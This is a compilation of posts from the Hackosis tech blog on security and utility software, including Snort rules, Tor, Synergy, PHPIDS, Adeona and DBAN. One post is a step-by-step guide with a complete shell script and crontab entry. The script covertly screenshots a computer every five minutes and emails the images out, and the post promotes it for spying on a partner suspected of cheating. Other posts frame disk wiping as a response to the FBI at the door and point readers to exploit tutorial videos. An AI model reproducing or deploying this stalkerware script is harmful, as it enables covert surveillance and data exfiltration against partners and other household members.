Hackosis

Emerging Threats hosts the only open snort rule set.

Emerging Threats is funded by National Science Foundation and the Army Research Office.

You can download the rule sets separately or all at once.

Check out the perl script to automatically update your iptables, Honeywall and Smoothwall configurations, and the inline snort config.

Confused? Read the Emerging Threats documentation site.

What is Snort?

SNORT® is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.

If you use snort and don’t already know about Emerging Threats I am sure it will help you out on your intrusion detecting escapade. If you have any tips for using Emerging Threat’s rules let us know in the comments.

The Tor Browser bundle makes it easy to use Tor without having to install any software on your PC. You can even slap it on your jump drive to use any where you go.

And it is as easy as — download, extract, run!

From the site:

The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.

The Tor Browser Bundle lets you use Tor on Windows without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser and is self contained. The Tor IM Browser Bundle additionally allows instant messaging and chat. If you would prefer to use your existing web browser, install Tor permanently, or if you don’t use Windows, see the other ways to download Tor.

The bundle includes portable Firefox and also Pidgin IM software with the IM Browser bundle (separate download).

Check out the Tor Browser page for downloads and instructions.

If you like Tor you might want to check out Take Control of Tor With Vidalia, Browse Anonymously with XeroBank, and using Anonym.OS to encrypt and anonymize traffic.

You have multiple computers, and your desk is cluttered with keyboards, mice, and monitors? You desperately need more space, and you are tired of moving your hands the long way from one keyboard to the next? Do not worry any more – rescue is here in form of synergy.

Synergy is a nifty little program which allows you to share your mouse and keyboard with other computers on your network. Just move the mouse out of your screen and it magically appears on the screen of the next computer allowing you to type there. Additionally, you can share cut and paste selections, so you can cut something on one screen/PC, move the mouse to the other screen and paste your selection there . Synergy is available for Windows (XP, NT), GNU/Linux, Mac OS X, and Unix. And the best thing is you can even mix different operating systems. Sounds interesting? So let’s see how it works.

Synergy is composed of a server (synergys) and a client part (synergyc) which communicate with each other over a network to exchange keyboard and mouse events. The server is started on the main PC whose keyboard and mouse should be shared, and the client is started on each machine which should use the input devices of the server. In the configuration file, you define which screen is to the left, right, top, or bottom of each monitor. (like in other multi-monitor setups). If the mouse is moved over an edge, the control events are sent over the network to the host which is defined in the configuration.

Get it

There are binary packages available at the synergy sourceforge page, but if you are using a OS with package management system I recommend checking if it is available there first. Install synergy on every machine which should participate in the input sharing.

Read the rest of this entry …

Infinity Exists features many ‘how to’ videos to quench your inner thirst for exploit information. Topics include lock picking, password cracking, email spoofing, SQL injection, and much more.

What are you waiting for? Go check out the videos!

Tired of users not being able to play videos to the the lack of proper media software or codecs? Fret no more as open source MakeInstantPlayer solves this issue by packing any video file into a self contained executable.

No additional software is required to play back the video:

MakeInstantPlayer is a tool for converting video files into self-running executables.
This is very useful for distributing videos, as the user doesn’t need any additional software for playback.
As MakeInstantPlayer uses the MPlayer engine for playback, it supports almost any video format in existance.
Furthermore it uses NSIS to pack everthing to one single EXE file.

Congrats to MuldeR for this nifty software! Be sure to check out MuldeR’s other projects as well.

Download MakeInstantPlayer.

TIP: when playing the .exe movie be sure that there is enough space on the system drive because MPlayer will create a temporary folder and the movie will be played from there.

Open source PHPIDS is a customizable intrusion detection system for your web applications. PHPIDS uses a set of filter rules to detect specific strings in URLs that indicate a possible hacking attempt.

PHPIDS can do everything from log the attacks to email you the IP address of the attacker. Be sure to check out the example.php inside of the docs folder for instructions on installation.

Download PHPIDS @ php-ids.org.

PHPIDS too complicated for you? Try the simple .htaccess intrusion detection system.

Hackosis.com is now open source. This opens up a whole new world of opportunity to this blog and anyone that wants to be involved.

What does this mean?

1. You can modify and redistribute the content on Hackosis.com in any way you like. We don’t require that you give credit, but it is appreciated.
2. You can submit articles to Hackosis using the submission form. We will give you credit.
3. You can participate in modifying posts to improve the quality and content. I have outlined the details on the open source statement page.

Remember, there are no restrictions on what you can submit or modify! Just be sure to follow proper netiquette, cite sources, no stealing content, etc.

My plans in the future include this blog turning into somewhat of a wiki-blog hybrid that everyone can easily take part in. Please contact us if you are interested in helping speed the process.

How does this benefit me?

1. While we prefer that you submit original content, it is not required for inclusion. You could link to your blog or web site.
2. Take part in what will be an awesome community with help from many great minds from around the web (including myself ;P).
3. The potential to be featured on lifehacker.com, digg.com or other great sites.
4. This site receives around 5,000 visits a day, so your content will be seen.
5. This is just the beginning. Remember everything here is changeable. Let your voice be heard.

That’s that, and I now invite you to suggest edits on content (including this post or any pages) and submission of posts. Through a collaborative effort we can make great things happen.

Lets experiment with the process on this page. You don’t have to register to comment.

[changefrom]the original content you wish to change[/changefrom]
[changeto]the new content you wish to change the original content to[/changeto]

Let the games begin…

Have suspicions about what goes on on your own computer when you are away? Think someone might be cheating? Do you often see that the history has been deleted out of the browser? Maybe you just want to keep tabs on what your kids are looking at when you aren’t right there watching.

By using some basic Linux commands and utilities (import, cron, postfix, and mutt) we can spy on any PC we have root access to.

The process is as follows:

1. Cron takes a screen shot of the desktop and saves it to a file using the import command.
2. Cron emails the screenshot to a specified address on a specific interval by using mutt.

The process is quite simple. Just open your terminal follow these steps (tested on Ubuntu, should work on other distros as well):

1. Install postfix, mutt, and imagemagick (for import):
    sudo apt-get install postfix mutt imagemagick
2. Create a message text file with something in it. Doesn’t matter what, just so it doesn’t get caught by the spam filters:
     nano /path/to/message.txt
3. Create a file named ’spy.sh’ (save it somewhere secretive) and add the following lines (fifth and sixth lines are one line). Change emailaccount@domain.com to your email address. Feel free to remove the rm command if you would like to keep the images stored locally (I would recommend moving them out of the /tmp directory tho):
     #!/bin/sh
   NOW=$(date +%Y%m%d%k%M)
   cd /tmp
   import -window root screenshot-$NOW.jpg
   mutt -s "Screenshot for $NOW" -a ./screenshot-$NOW.jpg emailaccount@domain.com < /path/to/message.txt
   rm /tmp/screenshot-$NOW.jpg
4. Now make the spy.sh executable:
     chmod u+x /path/to/spy.sh
5. Run the following (my cron didn’t run without it):
     sudo touch /etc/cron.deny
6. Edit your crontab ‘ sudo crontab -e‘ and enter the following:
    */5 * * * * /path/to/spy.sh

WARNING: This will email you a screen shot every 5 minutes. While this is great for spying beware that your email could fill up pretty quick! Take out some minutes in your crontab to decrease the interval ex, */10 for every 10 minutes or */20 for every 20 minutes.

TIP: If you don’t want the screenshot emailer running while you are on the PC just comment out the line we added with a ‘#’ at the beginning. Don’t forget to change it back before you leave!

TIP: If you aren’t receiving your messages your email server might be rejecting the email because it is originating from a dynamic IP range. In this case, you will need to configure mutt to use your email server instead.

That’s it! You should start receiving screen shots of your desktop in action once the crontab has been hit the first cycle. If you have any problems or questions feel free to leave a comment.

Adeona is open source software to system used to securely and privately track the location of your Windows, Mac, or Linux laptop.

What makes Adeona stand out, even from proprietary solutions, is it’s ability to securely transmit the location data preventing 3rd parties from also gathering the information.

Keep in mind that Adeona is still in beta, so don’t expect a perfect program just yet. Please do report any bugs that you might find.

Installation methods differ between operating systems so be sure to read the download instructions.

One interesting question from the FAQs:

Can I install this on my girlfriend or boyfriend’s computer and track her or him, and perhaps get pictures of them while they’re doing certain activites?

Yes. Like all technologies, Adeona has the potential for being abused. However, if you are malicious enough to want to do the above, there is probably other software available out there more suited for your needs. (We won’t provide links to these more malicious tools.)

Adeona seems to be a good solution to give you a piece of mind that if your laptop gets stolen, you might have a chance to retrieve it.

If you have any other suggestions for software to track your stolen laptop, please let us know in the comments as always.

Need to securely erase any hard drives hooked to your PC automatically when the FBI knocks on the door? Lets hope that isn’t the case, but if so Darik’s Boot and Nuke is the perfect solution. Darik’s Boot and Nuke is a ’self contained floppy disc’ that securely wipes all hard drives detected on the local PC.

From the README:

1.0 About Darik’s Boot and Nuke
——————————–

Darik’s Boot and Nuke (”DBAN”) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and completely
delete the contents of any hard disk that it can detect, which makes it an
appropriate utility for bulk or emergency data destruction.

Download the exe and write the image to a floppy. Just make sure your kids or little brother don’t accidentally get a hold of the disk a boot from it!

Linux users can also unzip the exe and use dd to transfer the image to a floppy (see the README).

I know a lot of you know longer have floppy drives – there are more convenient DBAN CD images available.

How to automatically wipe all hard drives

WARNING: THIS WILL PERMANENTLY ERASE ALL DATA ON ALL HARD DRIVE HOOKED TO THE PC!!!

1. Boot from the DBAN floppy or CD image.
2. Enter ‘autonuke’ at the boot prompt.

And it is as simple as that! Hope you enjoyed and if you have any other methods of securely wiping your hard drives on the fly let us know in the comments!